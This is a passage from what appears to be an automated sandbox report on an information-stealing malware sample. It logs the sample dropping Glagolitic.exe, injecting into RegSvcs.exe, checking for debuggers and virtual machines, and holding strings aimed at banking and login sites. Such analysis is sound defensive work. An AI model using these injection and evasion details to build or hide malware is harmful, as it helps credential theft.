              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595235Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595110Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594985Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594860Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594737Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594610Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594485Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594360Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594235Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594110Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593985Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593860Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599891Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599672Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599563Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599453Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599344Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599219Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599110Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598985Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598860Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598735Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598610Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598485Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598360Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598235Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598110Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597985Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597860Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597735Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597610Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597485Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597360Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597191Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597063Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596938Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596813Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596703Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596564Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596438Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596328Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596219Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596094Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595985Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595860Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595735Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595610Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595485Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595360Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595235Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595110Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594985Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594860Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594735Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594610Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594467Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594122Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594016Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593891Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593766Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593656Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593547Jump to behavior
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
              Source: RegSvcs.exe, 00000003.00000002.3308161970.0000000001596000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
              Source: mKRflLn5sx.exe, 00000000.00000002.859463226.0000000000AAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
              Source: RegSvcs.exe, 00000006.00000002.3308619299.0000000000E89000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeAPI call chain: ExitProcess graph end nodegraph_0-87283
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeAPI call chain: ExitProcess graph end node
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeAPI call chain: ExitProcess graph end node
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeAPI call chain: ExitProcess graph end node
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeAPI call chain: ExitProcess graph end node
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_06529548 LdrInitializeThunk,6_2_06529548
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0045A370 BlockInput,0_2_0045A370
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_03F19120 mov eax, dword ptr fs:[00000030h]0_2_03F19120
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_03F190C0 mov eax, dword ptr fs:[00000030h]0_2_03F190C0
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_03F17AB0 mov eax, dword ptr fs:[00000030h]0_2_03F17AB0
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_03F63680 mov eax, dword ptr fs:[00000030h]2_2_03F63680
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_03F64CF0 mov eax, dword ptr fs:[00000030h]2_2_03F64CF0
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_03F64C90 mov eax, dword ptr fs:[00000030h]2_2_03F64C90
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_03EDD680 mov eax, dword ptr fs:[00000030h]5_2_03EDD680
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_03EDECF0 mov eax, dword ptr fs:[00000030h]5_2_03EDECF0
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_03EDEC90 mov eax, dword ptr fs:[00000030h]5_2_03EDEC90
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,RtlAllocateHeap,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_004238DA
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_0041F250 SetUnhandledExceptionFilter,2_2_0041F250
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0041A208
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00417DAA
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_0041F250 SetUnhandledExceptionFilter,5_2_0041F250
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0041A208
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00417DAA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1159008Jump to behavior
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 937008Jump to behavior
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_0043333C
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\mKRflLn5sx.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\croc\Glagolitic.exe "C:\Users\user\AppData\Local\croc\Glagolitic.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\croc\Glagolitic.exe" Jump to behavior
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
              Source: Glagolitic.exeBinary or memory string: Shell_TrayWnd
              Source: mKRflLn5sx.exe, 00000000.00000002.859146828.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Glagolitic.exe, 00000002.00000002.875780279.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Glagolitic.exe, 00000005.00000002.987621063.0000000000401000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_0041E364
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000003.00000002.3309658145.0000000003251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.3309591385.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 5.2.Glagolitic.exe.3830000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.Glagolitic.exe.3830000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.Glagolitic.exe.3c20000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.Glagolitic.exe.3c20000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000002.876716377.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.3307267063.0000000000435000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.989629914.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Glagolitic.exe PID: 5960, type: MEMORYSTR
